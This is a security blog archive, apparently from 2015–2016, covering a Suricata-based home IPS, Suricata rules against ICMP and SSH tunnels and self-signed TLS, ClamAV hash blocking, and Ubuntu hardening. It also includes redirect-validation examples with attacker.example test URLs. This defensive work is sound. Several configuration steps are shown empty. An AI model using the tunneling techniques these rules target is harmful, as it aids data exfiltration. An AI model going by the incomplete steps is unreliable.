Thursday, January 14, 2016

HOWTO : Network Security for Home and SOHO Users

Do you think an Intrusion Prevention System (IPS) can never be deployed in a home or SOHO environment because of the cost? I have good news for you: you can deploy an IPS at home or in a SOHO at a very low price.

Croissants is an Intrusion Detection and Prevention System (IDPS) developed by me (Samiux). Its engine is the next generation IDPS, Suricata, which is a very high performance engine.

Features of Croissants :

- Plug, Play and Forget!
- Suricata, the next generation IDPS, as the IDPS engine
- Based on ET Open rules (can use ET Pro rules with minimal settings)
- Works with ClamAV (open source anti-virus) MD5 signatures
- Works with LMD (Linux Malware Detect) MD5 signatures
- Works with IP reputation blacklists
- Works with an SSL certificate blacklist
- Works with the DenyHosts SSH blacklist
- Works with an advertising domains blacklist
- Drops certain traffic with minimal settings
- Disables and enables rules with minimal settings
- Auto updates ET Open rules, MD5 signatures and blacklists
- Data analysis with charts on the web interface
- 4K video streaming playback capable
- Can play common online games (but not ideal for demanding First Person Shooter games as it may have spikes) Demo videos

The Zotac CI323 Nano Plus ships with Windows 10 and is equipped with 2 wired network interfaces and 1 wireless interface, as well as 4GB RAM and an onboard 32GB M.2 SSD.

The Zotac CI323 Nano Plus is ideal for installing Croissants when you add an extra 4GB of RAM or replace it with two 8GB modules (16GB in total). I recommend installing 16GB RAM for better performance. You also need a wireless router. Croissants (special version for the CI323) can be installed on the 32GB M.2 SSD with Ubuntu 14.04 LTS Server installed beforehand. However, it is better to install it on a hard drive or SSD drive.

You can get the special version from the following links (the current version is 1.0-RELEASE). Please also note that the performance of the 16GB version is higher than that of the 8GB version :

8GB RAM Zotac CI323 - http://www.infosec-ninjas.com/files/croissants-1.0/croissants-home-ci323-1.0-RELEASE.tar.gz
sha256sum - a12f78ae571fa93dce0ee68f383c8b5af39a903ccaac09336dcaf0b9c5fd6278 croissants-home-ci323-1.0-RELEASE.tar.gz

16GB RAM Zotac CI323 - http://www.infosec-ninjas.com/files/croissants-1.0/croissants-smb-ci323-1.0-RELEASE.tar.gz
sha256sum - 759616b21235353953ab363f6ca8f6ecbe05e48a7988b0c771675596045959ba croissants-smb-ci323-1.0-RELEASE.tar.gz

Please refer to the Croissants website for the installation procedure. The procedure is similar to the standard version of Croissants. Note that this special version only keeps 60 days of data.

Make sure you connect the Zotac CI323 between the ISP and the wireless router, and that the monitoring cable is connected to the router or switch (if any).

Before installing Croissants, you need to edit nsm.conf :

WIFI_SSID - The SSID of your wireless router
WIFI_PASSWORD - The password of your wireless router

The default monitoring IP will be x.x.x.180, such as 192.168.1.180.





To extend the security of your network, you may consider adding the following OpenDNS servers to your router.

OpenDNS FamilyShield DNS servers have built-in fraud and phishing protection and are pre-configured to block adult content :
208.67.222.123
208.67.220.123

OpenDNS Home DNS servers have the same features, but you can customize what content is filtered. You can register with OpenDNS Home for the customization or just use the following servers without customization. They all use the following addresses :
208.67.222.222
208.67.220.220

OpenDNS DNS servers are compatible with Croissants.


REFERENCE

5 DNS Services to Block Porn Sites without Installing Software
HOWTO : Hardening and Tuning Ubuntu 14.04 LTS

That's all! See you.


Monday, December 07, 2015

Facebook Don't Care About Their Users Again

Several years ago, a researcher found a vulnerability in Facebook. He informed the company and provided the PoC in full detail when asked. Later, the researcher was told that it was not vulnerable. The researcher then exploited the account of Facebook's founder with the vulnerability he had found in order to alert the founder. However, the researcher did not get his bug bounty in the end, although the vulnerability was then fixed by Facebook. Some Facebook users, knowing this, funded the researcher themselves because they thought that the researcher needed the reward.

Today, another researcher, teh3ck (Twitter @teh_h3ck), found an open-redirect vulnerability and informed Facebook. However, teh3ck was told that "the security impact of this bug is not significant" and Facebook refused to pay the bug bounty. The following is the timeline of the bug report :

12th of Nov 2015 | Initial bug report
12th of Nov 2015 | Reply from FB bot that it is a false positive
12th of Nov 2015 | Added more clarification for the bug
16th of Nov 2015 | Reply from Facebook that they use a blacklist method on their next_uri
16th of Nov 2015 | Sent PoC videos of the bug that show the impact of the vulnerability
18th of Nov 2015 | Reply from Facebook that I am redirecting to a non-blacklisted site
18th of Nov 2015 | Explaining why URL blacklisting is not the solution for the specific bug
26th of Nov 2015 | Reply from FB that the security impact of this bug is not significant.
6th of Dec 2015 | Public post of the bug

For details, please refer to Vag Mour site.
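To show why a blacklist on next_uri does not close an open redirect, here is an added example (not code from the report or from Facebook) that places a blacklist check beside an allowlist check; the host names, the allowed and blocked lists, and the function names are constructed for this illustration.

```python
from urllib.parse import urlsplit

# Constructed values for this example: the site's own hosts and a blacklist of
# hosts already reported as abusive. None of these are real Facebook hosts.
SITE_HOST = "www.example.com"
ALLOWED_HOSTS = {SITE_HOST, "m.example.com"}
BLOCKED_HOSTS = {"phish.example", "malware.example"}


def safe_by_blacklist(next_uri: str) -> bool:
    """Blacklist approach: reject only targets whose host is already known bad.

    Any host not yet on the list, which is every newly registered domain, is
    accepted, so the redirect stays open no matter how long the list grows.
    """
    host = (urlsplit(next_uri).hostname or "").lower()
    return host not in BLOCKED_HOSTS


def safe_by_allowlist(next_uri: str) -> bool:
    """Allowlist approach: accept only same-site paths or known hosts over https."""
    parts = urlsplit(next_uri)
    if parts.scheme == "" and parts.netloc == "":
        # A plain path such as "/settings". Browsers resolve "//host" and
        # "///host" to an external host and some treat "/\host" the same way,
        # so a leading "//" or any backslash is rejected here.
        return (next_uri.startswith("/")
                and not next_uri.startswith("//")
                and "\\" not in next_uri)
    if parts.scheme.lower() != "https":
        return False
    # hostname drops any "user@" prefix, so "https://www.example.com@evil/"
    # yields the host "evil" and is rejected instead of looking same-site.
    return (parts.hostname or "").lower() in ALLOWED_HOSTS


def resolve_redirect(next_uri: str, check) -> str:
    """Return the redirect target if it passes the check, else the site root."""
    return next_uri if check(next_uri) else "/"


if __name__ == "__main__":
    samples = [
        "/home",
        "https://www.example.com/settings",
        "https://attacker.example/login",
        "//attacker.example/",
        "https://www.example.com@attacker.example/",
        "https://phish.example/",
    ]
    for uri in samples:
        print(f"{uri:45} blacklist={safe_by_blacklist(uri)!s:5} "
              f"allowlist={safe_by_allowlist(uri)!s:5}")
```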

In conclusion, Facebook and its security team suck again.

That's all! See you.

Update :

Several hours after teh3ck's post and this article were published, Facebook fixed the vulnerability without giving teh3ck any bug bounty. My recommendation is not to report to Facebook if you find anything else on it. You will never, never, never get the bug bounty for sure.


Tuesday, November 10, 2015

HOWTO : Quick Audit Your Android Devices

*** Google Play install is no longer supported by Google. The official site provides an apk file download for installation. Make sure you have enabled "Unknown sources" under "Settings" -- "Security" before installing. ***

Recently, there have been some well-known vulnerabilities in Android devices from Android 4.x to 5.x as well as 6.x. Since not all Android device vendors will release fixes, you can inspect your devices to see whether they are vulnerable or not. If they are vulnerable, you can use them with care or change to other devices in which the vulnerabilities have been fixed.

VTS for Android is an open source project which can scan for the following current vulnerabilities :

ZipBug9950697
Zip Bug 8219321 / Master keys
Zip Bug 9695860
Jar Bug 13678484 / Android FakeID
CVE 2013-6282 / put/get_user
CVE_2011_1149 / PSNueter / Ashmem Exploit
CVE_2014_3153 / Futex bug / Towelroot
CVE 2014-3847 / WeakSauce
StumpRoot
Stagefright bugs
x509 Serialization bug
PingPong root - CVE-2015-3636
Stagefright - CVE-2015-6602
Samsung Remote Code Execution as System
CVE-2015-6608
CVE-2015-7414
CVE-2015-1528
CVE-2015-6616

By the way, we should also beware of adware. Some adware can auto-root your Android device and is almost impossible to remove. For details, please refer to this article.

That's all! See you.


HOWTO : Audit Your Home Router

Recently, a lot of home routers have been compromised. However, home router vendors will not disclose whether the vulnerabilities have been fixed or not. If you are an Android user and use wifi at home, you can audit your home router easily with RouterCheck, which can be downloaded from Google Play.

This app will check whether the router's default username and password are still in force. It will also check whether your router has known vulnerabilities.

It will not change any setting on your router, but it gives you some information to improve the security of your router.

That's all! See you.


Monday, October 26, 2015

HOWTO : Detect and Prevent ICMP Tunnel Attack on Suricata

Recently, I read an article about the ICMP tunnel attack. It demonstrates how to upload a file by encoding the content with Base64 and sending it via the ICMP protocol.

There is a Suricata rule for detecting large ICMP packets, but it is currently disabled by default (as of Oct 26, 2015). The rule is :

#alert icmp any any -> any any (msg:"GPL ICMP Large ICMP Packet"; dsize:>800; reference:arachnids,246; classtype:bad-unknown; sid:1000029; rev:5;)

We can enable it by removing the "#" in front of the rule and changing "alert" to "drop".

However, it cannot tell whether the packet payload is encoded with Base64. I drafted the following Suricata rule, based on the previous one, and set it to "drop" :

drop icmp any any -> any any (msg:"LOCAL ICMP Large ICMP Packet (Base64)"; dsize:>800; content:"="; pcre:"/^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$/"; reference:url,www.notsosecure.com/2015/10/15/icmp-tunnels-a-case-study/; classtype:bad-unknown; sid:1000028; rev:1;)
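As an added test harness (not part of the original post), the following Python reproduces the three matching conditions of the drafted rule, dsize:>800, content:"=" and the pcre, and runs them over constructed ICMP payloads, including one that the rule does not fire on; the function and sample names are this example's own.

```python
import base64
import re

# The three conditions of sid:1000028, reproduced one by one.
MIN_DSIZE = 800                      # dsize:>800 (payload bytes, headers excluded)
REQUIRED_CONTENT = b"="              # content:"="
BASE64_RE = re.compile(              # the pcre from the rule, unchanged
    rb"^(?:[A-Za-z0-9+/]{4})*"
    rb"(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$"
)


def rule_matches(payload: bytes) -> bool:
    """Return True when an ICMP payload would satisfy every keyword of the rule."""
    if len(payload) <= MIN_DSIZE:
        return False
    if REQUIRED_CONTENT not in payload:
        return False
    return BASE64_RE.match(payload) is not None


# Constructed sample payloads (the ICMP data field only).
SAMPLES = {
    # 700 raw bytes -> 936 Base64 bytes ending in "==": caught
    "b64_padded": base64.b64encode(b"A" * 700),
    # 702 raw bytes -> 936 Base64 bytes with no padding: dsize and pcre would
    # hold, but content:"=" fails, so the rule stays silent on this chunk
    "b64_unpadded": base64.b64encode(b"A" * 702),
    # a large ordinary ping-style byte pattern: it contains 0x3d ("="), so
    # only the pcre keeps it from being a false positive
    "ping_pattern": bytes(range(256)) * 4,
    # a short Base64 blob: padded, but far below the size threshold
    "b64_small": base64.b64encode(b"short file"),
}


def evaluate_samples() -> dict:
    """Map each sample name to whether the rule would fire on it."""
    return {name: rule_matches(data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, hit in evaluate_samples().items():
        print(f"{name:13} {len(SAMPLES[name]):5d} bytes  match={hit}")
```

The unpadded case is worth knowing when tuning: Suricata only evaluates the pcre after the content match succeeds, so a chunk whose plaintext length is a multiple of 3 bytes carries no "=" and is never inspected by the regex.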

That's all! See you.


Thursday, October 22, 2015

HOWTO : Self-signed Certificate on Suricata

Problem

The most common weakness of an Intrusion Detection and Prevention System is encrypted traffic inspection. Encrypted SSL/TLS traffic requires a signed certificate for decryption. Some malicious activities use a self-signed certificate for the SSL/TLS connection.

Solution

How can we do that? If you are running Suricata as an IPS, you can do it very easily with reference to this blog. The rule will detect self-signed certificates regardless of the port number.

Make sure you have configured Suricata properly according to the blog.

You can also use this rule for other purposes too.

Quick Reference

self-signed-cert.lua

The suricata rule is :

alert tls any any -> any any (msg:"SURICATA TLS Self Signed Certificate"; flow:established; luajit:self-signed-cert.lua; tls.store; classtype:protocol-command-decode; sid:999666111; rev:1;)

HOWTO : LuaJIT on Suricata

That's all! See you.


Thursday, October 15, 2015

HOWTO : Detect and Prevent SSH Tunnel On Suricata

Problem

The most common weakness of an Intrusion Detection and Prevention System is encrypted traffic inspection. Encrypted SSH traffic relies on private/public keys for encryption/decryption, and it is very hard to obtain the private key from attackers.

Solution

How can we do that? If you are running Suricata as an IPS, SSH dynamic, reverse and port forwarding tunnels will be detected by the following rules :

# ssh (port 5228=Google Talk, port 6697=IRC)
alert tcp any any -> any 22 (msg:"LOCAL SSH connect"; flow:established,to_server; app-layer-protocol:ssh; sid:1000008; rev:1;)

drop tcp any any -> any 22 (msg:"LOCAL not SSH but Port 22"; flow:established,to_server; app-layer-protocol:!ssh; sid:1000009; rev:1;)

drop tcp any any -> any ![22,5228,6697] (msg:"LOCAL SSH but not Port 22"; flow:established,to_server; app-layer-protocol:ssh; sid:1000010; rev:1;)


The first rule will alert you that there is an SSH connection to port 22. The second rule will block traffic that is not the SSH protocol but connects to port 22. The last rule will block SSH connections that do not go to port 22, 5228 or 6697, where port 5228 is Google Talk and port 6697 is IRC.

If you do not use the standard port 22 for SSH, change the value as necessary.
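As an added example covering both this post and the self-signed certificate post above (not code from either post), the following Python reviews Suricata EVE JSON for the same two conditions, a TLS certificate whose issuer DN equals its subject DN and SSH seen on a port outside the allowed set. The log lines are constructed but follow the field layout of Suricata's tls and ssh event types; the function names are this example's own.

```python
import json

# Ports on which SSH is expected, mirroring ![22,5228,6697] in the rule above.
ALLOWED_SSH_PORTS = {22, 5228, 6697}

# Constructed EVE records; addresses come from the RFC 5737 documentation ranges.
SAMPLE_EVE = """\
{"event_type":"tls","src_ip":"192.0.2.20","dest_ip":"203.0.113.10","dest_port":443,"tls":{"subject":"CN=www.example.com","issuerdn":"CN=Example Issuing CA","sni":"www.example.com"}}
{"event_type":"tls","src_ip":"192.0.2.21","dest_ip":"198.51.100.7","dest_port":8443,"tls":{"subject":"CN=localhost","issuerdn":"CN=localhost"}}
{"event_type":"ssh","src_ip":"192.0.2.22","dest_ip":"192.0.2.5","dest_port":22,"ssh":{"client":{"proto_version":"2.0","software_version":"OpenSSH_6.6.1"}}}
{"event_type":"ssh","src_ip":"192.0.2.22","dest_ip":"192.0.2.9","dest_port":2222,"ssh":{"client":{"proto_version":"2.0","software_version":"OpenSSH_6.6.1"}}}
{"event_type":"ssh","src_ip":"192.0.2.23","dest_ip":"192.0.2.11","dest_port":6697,"ssh":{"client":{"proto_version":"2.0","software_version":"PuTTY_Release_0.65"}}}
{"event_type":"http","src_ip":"192.0.2.24","dest_ip":"203.0.113.10","dest_port":80,"http":{"hostname":"www.example.com","url":"/"}}
"""


def is_self_signed(tls: dict) -> bool:
    """Issuer DN identical to subject DN is the usual self-signed heuristic."""
    subject = tls.get("subject")
    return bool(subject) and subject == tls.get("issuerdn")


def review_eve(lines):
    """Return (finding, dest_ip, dest_port) tuples for the two conditions."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a partial line, common at the tail of a live eve.json
        etype = event.get("event_type")
        if etype == "tls" and is_self_signed(event.get("tls", {})):
            findings.append(("self-signed-tls", event["dest_ip"], event["dest_port"]))
        elif etype == "ssh" and event.get("dest_port") not in ALLOWED_SSH_PORTS:
            findings.append(("ssh-nonstandard-port", event["dest_ip"], event["dest_port"]))
    return findings


if __name__ == "__main__":
    for finding in review_eve(SAMPLE_EVE.splitlines()):
        print(*finding)
```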

Reference

SSH Brute Force and Suricata
Protocol Anomalies Detection

That's all! See you.


Wednesday, October 14, 2015

HOWTO : LuaJIT on Suricata

What is LuaJIT?

LuaJIT is a Just-In-Time Compiler (JIT) for the Lua programming language. Lua is a powerful, dynamic and light-weight programming language. It may be embedded or used as a general-purpose, stand-alone language.

LuaJIT can be used as a scripting language for Suricata detection rules. Emerging Threats provides some Lua scripts for Suricata here.

Lua is not enabled by default in Suricata. You need to re-compile it to make it work.

If you compile Suricata from GitHub, you can do the following :

Compile and install LuaJIT :

The current version at the time of writing is 2.0.4.

cd ~
git clone http://luajit.org/git/luajit-2.0.git
cd luajit-2.0
make
sudo make install


Compile and install Suricata on Ubuntu 14.04.3 LTS :

cd ~
git clone git://phalanx.openinfosecfoundation.org/oisf.git
cd oisf
git clone https://github.com/ironbee/libhtp.git

./autogen.sh
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/ --enable-luajit \
--enable-geoip --with-libnss-libraries=/usr/lib --with-libnss-includes=/usr/include/nss/ \
--with-libnspr-libraries=/usr/lib --with-libnspr-includes=/usr/include/nspr \
--with-libcap_ng-libraries=/usr/local/lib --with-libcap_ng-includes=/usr/local/include \
--with-libluajit-includes=/usr/local/include/luajit-2.0/ \
--with-libluajit-libraries=/usr/local/lib/


make clean
make
sudo make install
sudo ldconfig


Working with ET Lua scripts :

# install lua related packages
sudo apt-get -y install cmake lua-zip lua-zip-dev lua-zlib lua-zlib-dev \
luarocks libzzip-dev libzzip-0.13 lua-apr lua-apr-dev lua-socket \
lua-socket-dev lua-sec lua-sec-dev lua-rex-gnu lua-rex-gnu-dev \
lua-rex-pcre lua-rex-pcre-dev lua-bitop lua-bitop-dev liblua5.1 \
libzip-dev

sudo apt-get -y install cmake build-essential

sudo luarocks install struct
sudo luarocks install bitlib

sudo cp /usr/lib/x86_64-linux-gnu/liblua5.1.so /usr/local/lib/liblua.so


# compile and install ltn12ce
cd ~
git clone https://github.com/mkottman/ltn12ce.git
cd ltn12ce
mkdir build && cd build
cmake ..
make
sudo make install
sudo mkdir -p /usr/local/lib/lua/5.1/ltn12ce
sudo cp ~/ltn12ce/build/src/ltn12ce/core.so /usr/local/lib/lua/5.1/ltn12ce


# compile and install zlib
cd ~
wget http://zlib.net/zlib-1.2.8.tar.gz
tar -xzvf zlib-1.2.8.tar.gz
cd zlib-1.2.8
./configure
make
sudo make install


# compile and install lua-zlib
cd ~
git clone https://github.com/brimworks/lua-zlib.git
cd lua-zlib
make linux
sudo mkdir -p /usr/lib/lua/5.1
sudo mkdir -p /usr/local/lib/lua/5.1
sudo cp zlib.so /usr/local/lib/lua/5.1
sudo make install

sudo cp /usr/lib/x86_64-linux-gnu/lua/5.1/zip.so /usr/local/lib/lua/5.1
sudo mkdir -p /usr/local/lib/lua/5.1/apr
sudo cp /usr/lib/x86_64-linux-gnu/lua/5.1/apr/core.so /usr/local/lib/lua/5.1/apr



Make sure the ET Lua scripts and related rules are placed in "/etc/suricata/rules" and that "luajit-drop.rules" or "luajit.rules" is loaded in suricata.yaml.

Bug Fix on ET Lua scripts :

Please note that CVE-2015-1770.lua and CVE-2015-2375.lua have a small bug when used with LuaJIT. You can fix them like this :

sudo sed -i -e 's/activeX%d+\\.xml/activeX%d+.xml/g' /etc/suricata/rules/CVE-2015-1770.lua
sudo sed -i -e 's/table%d+\\.xml/table%d+.xml/g' /etc/suricata/rules/CVE-2015-2375.lua


Finally, if you are using Snorby, you need to copy all the rules files (except the Lua scripts) to another place, such as "/etc/suricata/rules/snorby"; otherwise, Snorby cannot display the rules when requested. You also need to edit "/var/www/snorby/config/snorby_config.yml" for the new rules path.

One more thing: the value of "prealloc" in the "flow" section of suricata.yaml should not be more than "4000000"; otherwise, the Lua scripts cannot be loaded.

After that, restart Suricata.

That's all! See you.


Friday, October 09, 2015

HOWTO : ClamAV For Suricata

Suricata is an Intrusion Detection and Prevention System and it can work with ClamAV too. One of the features of Suricata is matching files by MD5 hash. We can use the ClamAV MD5 signatures to inspect every file download. We can also save the malicious file for further analysis.

Install and Configure of ClamAV

sudo apt-get update
sudo apt-get install clamav
sudo update-rc.d clamav-freshclam disable


We will not use the ClamAV engine with Suricata, but the ClamAV MD5 signatures instead.

Prepare ClamAV MD5 Signature for Suricata

sudo nano /usr/bin/nsm_clamav_md5



sudo chmod +x /usr/bin/nsm_clamav_md5

Create cron job :

sudo crontab -e

0 03 * * * /usr/bin/nsm_clamav_md5


* The cron job will run the script (nsm_clamav_md5) at 03:00 every day, and it should run earlier than the Suricata rules update script/procedure.
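The conversion a script like nsm_clamav_md5 has to perform is turning ClamAV's hash signatures into the one-hash-per-line list that Suricata's filemd5 keyword reads. The following is an added example of that conversion, not the script from this post; it assumes the signature databases have already been unpacked into .hdb files (for instance with sigtool --unpack), whose lines have the form md5:size:name, and the sample lines are constructed apart from the first, which is the hash of the EICAR test file.

```python
import re
import sys

MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed .hdb lines in ClamAV's "md5:filesize:MalwareName" layout.
# The first hash is the EICAR test file's; the others are made up.
SAMPLE_HDB = """\
44d88612fea8a8f36de82e1278abb02f:68:Eicar-Test-Signature
0123456789ABCDEF0123456789ABCDEF:1024:Win.Trojan.Constructed-1
not-a-hash:10:Broken.Entry
0123456789abcdef0123456789abcdef:2048:Win.Trojan.Constructed-1-dup
deadbeefdeadbeefdeadbeefdeadbeef:*:Unix.Trojan.Constructed-2
"""


def hdb_to_md5_list(lines):
    """Extract unique, lower-case MD5 hashes from .hdb lines, keeping order.

    Malformed lines are skipped rather than copied through, because one bad
    entry would make Suricata reject the whole filemd5 list at start-up.
    """
    seen = set()
    hashes = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:            # need at least md5:size:name
            continue
        digest = fields[0].lower()     # Suricata compares hex case-insensitively,
        if not MD5_RE.match(digest):   # but a consistent case makes dedup exact
            continue
        if digest in seen:
            continue
        seen.add(digest)
        hashes.append(digest)
    return hashes


if __name__ == "__main__":
    # Usage: nsm_clamav_md5_example.py main.hdb daily.hdb > blacklist_md5
    # (blacklist_md5 being the file named by filemd5:blacklist_md5 in local.rules).
    # With no arguments the constructed sample is converted instead.
    all_lines = []
    for hdb_path in sys.argv[1:]:
        with open(hdb_path, errors="replace") as fh:
            all_lines.extend(fh)
    if not all_lines:
        all_lines = SAMPLE_HDB.splitlines()
    sys.stdout.write("\n".join(hdb_to_md5_list(all_lines)) + "\n")
```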

Create your Suricata Local Rule

sudo nano /etc/suricata/rules/local.rules

Append the following to the file :

# rules for file extraction
# this rule drops every file that matches a ClamAV MD5 hash
drop http any any -> any any (msg:"LOCAL Malicious file - Clamav MD5 Hash"; flow:established; filestore; filemd5:blacklist_md5; classtype: suspicious-filename-detect; sid:1000000; rev:1;)


Configure suricata.yaml

sudo nano /etc/suricata/suricata.yaml

Make the following settings as the following :



* If you do not want to save the malicious files for further analysis, you can disable the "file-store" setting in suricata.yaml and remove the "filestore" keyword from local.rules.

Make It To Work Together

sudo nsm_clamav_md5

Restart Suricata or reboot the box. For Croissants, you can restart Suricata by issuing the following command :

sudo restart suricata

Suricata will block malicious files from downloading when the MD5 hash matches, and the malicious files will be saved in /var/log/suricata/files for further inspection.

Known Issue

libhtp 0.5.x cannot handle a file download re-try from the browser at the moment. It is recommended that users do not re-try to download any file that could not be downloaded at first. According to the developer of libhtp, 0.6.x can handle this problem.

Another limitation is that Suricata can only detect the malicious files (by MD5 hash) that are known to ClamAV.

Reference

Filemd5 and white or black listing with MD5 hashes

That's all! See you.


Sunday, October 04, 2015

Cloudflare Or Not Cloudflare?

Cloudflare is very famous for defending against DDoS attacks. A by-product is that the IP address of a protected site is hidden, provided the owner of the protected site sets it up correctly. However, it is not very easy to set it up correctly when the owners do not fully understand the services Cloudflare provides.

Many website owners, including criminals, choose to use Cloudflare services. There are a lot of methods to resolve the IP address of websites behind Cloudflare protection, such as CrimeFlare. Almost all of these methods target the mis-configuration of Cloudflare. Some of the methods no longer work, as Cloudflare fixed the problem a long time ago.

Recently, there is a new method to resolve the IP address of websites behind Cloudflare, the Cloudflare IP resolver. However, if the webmaster or sysadmin is clever enough, this method also fails.

No matter what, this new method is a killer for Cloudflare for sure.

Finally, when you think that your system is very, very secure, your system is in great danger.

That's all! See you.


Thursday, September 17, 2015

Will Linux Be Infected By Malware Or Not?

When I first came to know Linux, almost all the advanced Linux users told me that Linux is impossible to infect with viruses and malware due to its excellent design. Except for root or a sudoer, nobody has the privilege to do harm to the system, including malware. In case your Linux is infected, only you (the user) are affected. Therefore, you are not required to install any anti-virus or anti-malware application on a Linux system. Meanwhile, Linux will not be infected by Windows-based malware. Moreover, Linux developers have tried to harden the Linux kernel in many ways, such as ASLR, XD/NX, SELinux, AppArmor, Gentoo's hardened kernel, etc.

After becoming an Information Security Enthusiast, I recognized that this is totally untrue. In my opinion, Linux, just like any other operating system, can be infected by malware, and the damage is not limited to your own system. There has been a lot of such news recently.

Linux users can be infected with malware in many ways, and some malware is cross-platform too. The most common way to be infected with malware is by surfing the internet with your browser. The other most common way is not keeping your Linux system up to date. For example, over 200,000 devices in the world are still vulnerable to the very famous Heartbleed vulnerability after more than a year.

Once you are infected, the malware can perform privilege escalation on your Linux system to gain the rights of root. How is this done? The most common way is a vulnerability in the kernel and/or application software. The other is social engineering. The most insecure part is the human being anyway.

Furthermore, most modern Linux distributions use sudoers. A sudoer has the rights of root. However, most sysadmins or users set their account name and password in a very weak way. In addition, the root password can be easily guessed in most cases on those distributions that do not use sudoers. I have only named some of them here; there are many ways to get root privileges on Linux systems, for example, misconfiguration of the Linux system and/or application software.

Hereby, I list some software, skills and tools as well as technologies related to Linux malware for your reference. I hope you all understand that Linux is not a bullet-proof system. It is very easy to break for sure. Finally, I would like to introduce how I harden Ubuntu for my current daily use; here you are.

Open Source Anti Linux Malware

Linux Malware Detect

ClamAV

Linux Forensics and Linux Malware Analysis

REMnux: A Linux Toolkit for Reverse-Engineering and Analyzing Malware

Linux and Disk Forensics

Books for Linux Malware Analysis and Forensics

Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides

Linux Forensics

Reference

Don’t believe these four myths about Linux security

Wiki - Linux malware

Wiki - Address Space Layout Randomization (ASLR)

Wiki - Social Engineering


That's all! See you.


HOWTO : ArpON on Ubuntu 14.04 LTS

ArpON (ARP handler inspection) is a portable handler daemon that makes the ARP protocol secure in order to avoid Man In The Middle (MITM) attacks through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR). It also blocks the attacks derived from these, such as Sniffing, Hijacking, Injection and Filtering, and the more complex attacks built on them, such as DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking.

Step 1 :

sudo apt-get update
sudo apt-get install arpon


Step 2 :

sudo nano /etc/default/arpon

Uncomment the DARPI and RUN lines so that the file looks like :

DAEMON_OPTS="-q -f /var/log/arpon/arpon.log -g -d"
RUN="yes"

Step 3 :

sudo /etc/init.d/arpon restart

That's all! See you.


Wednesday, September 16, 2015

HOWTO : Hardening and Tuning Ubuntu 14.04 LTS

This guide will lead you through hardening and tuning your Ubuntu 14.04 in a few steps without any expense. As an Information Security Enthusiast, my Ubuntu box is set up as follows, and I use the box every day.

Kernel Hardening and Tuning

Make sure you have enabled "No Execute (NX)" or "Execute Disable (XD)" in the BIOS/UEFI.

sudo nano /etc/sysctl.conf

To make it look like the following :



To reload it :

sudo sysctl -p

ARP Spoofing

One of the common attacks is the Man In The Middle attack. It can be used together with browser attacks too. This guide will help protect your Ubuntu from being spoofed. Meanwhile, make sure to set the ARP related settings in your router if the feature is available. Most home routers have no such feature.

HOWTO : ArpON on Ubuntu 14.04 LTS

Anti-Malware

Most Linux users (including advanced users) misunderstand and think that Linux can never be infected with malware. However, it is not true. Almost all operating systems face similar threats.

HOWTO : ClamAV on Ubuntu 14.04 LTS

This guide will lead you to set up ClamAV for "Scan On Access" instead of "Scan On Demand".

Network Interface Tuning

sudo nano /etc/rc.local

Insert the following before "exit 0" :

/sbin/ifconfig eth0 txqueuelen 10000
/sbin/ifconfig wlan0 txqueuelen 10000


* make sure your NICs are "eth0" and "wlan0"; otherwise, adjust the names

Storage Performance Tuning

(A) SSD

Verify TRIM is supported :

sudo hdparm -I /dev/sda | grep TRIM

If the output is similar to the line below, TRIM is supported :

* Data Set Management TRIM supported (limit 1 block)

If you installed Ubuntu on LVM, TRIM is usually enabled by default. You can confirm it :

cat /etc/lvm/lvm.conf | grep issue_discards

If the output is similar to the line below, it is enabled :

issue_discards = 1

Then set the I/O scheduler to "deadline" if it is not done yet. Check the current scheduler first :

cat /sys/block/sda/queue/scheduler

noop [deadline] cfq

If not, set it :

sudo nano /etc/rc.local

Insert the following before "exit 0" :

echo 1024 > /sys/block/sda/queue/read_ahead_kb
echo 1024 > /sys/block/sda/queue/nr_requests
echo deadline > /sys/block/sda/queue/scheduler


* make sure your device is sda (or sdb ...)

To reload it, run the following (or reboot your system) :

sudo /etc/rc.local

After that, you need to edit the partition table (the root entry in /etc/fstab) :

To make it look like the following :

/dev/mapper/ubuntu--vg-root / ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


If you get an error after running the above commands, DO NOT reboot your system. Correct the typo before doing so; otherwise, you will not be able to boot your system again.

Hard Drive

sudo nano /etc/rc.local

Insert the following before "exit 0" :

echo 1024 > /sys/block/sda/queue/read_ahead_kb
echo 1024 > /sys/block/sda/queue/nr_requests


* make sure your device is sda (or sdb ...)

To reload it, run the following (or reboot your system) :

sudo /etc/rc.local

After that, you need to edit the partition table (the root entry in /etc/fstab) :

To make it look like the following :

ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


If you get an error after running the above commands, DO NOT reboot your system. Correct the typo before doing so; otherwise, you will not be able to boot your system again.

Firefox Hardening and Tuning

Most malicious attacks nowadays come via browsers. Therefore, we need to protect ourselves even when using Linux.

(A) Apparmor For Firefox

AppArmor is a Linux Security Module implementation of name-based access controls.

sudo apt-get update
sudo apt-get install apparmor-utils apparmor-profiles


To make it look like the following :



sudo rm /etc/apparmor.d/disable/usr.bin.firefox

Reload the rules :

sudo apparmor_parser -r /etc/apparmor.d/usr.bin.firefox

(B) Firefox Add-ons

NoScript

Allow active content to run only from sites you trust, and protect yourself against XSS and Clickjacking attacks.

* You are not required to enable it, as it will block the JavaScript that most modern websites use. You need to disable it globally so that only its XSS attack protection stays on by default.

uBlock Origin

Finally, an efficient blocker. Easy on CPU and memory. (Please refer to the official site for details)

Cyscon Security Shield

Enjoy enhanced protection from phishing threats and malicious sites while browsing the Internet.

WebRTC Control

Have control over WebRTC (disable or enable) and protect your IP address.

BetterPrivacy

Remove or manage a new and uncommon kind of cookies, better known as LSOs. The BetterPrivacy safeguard offers various ways to handle Flash cookies set by Google, YouTube, Ebay and others...

HTTPS Everywhere

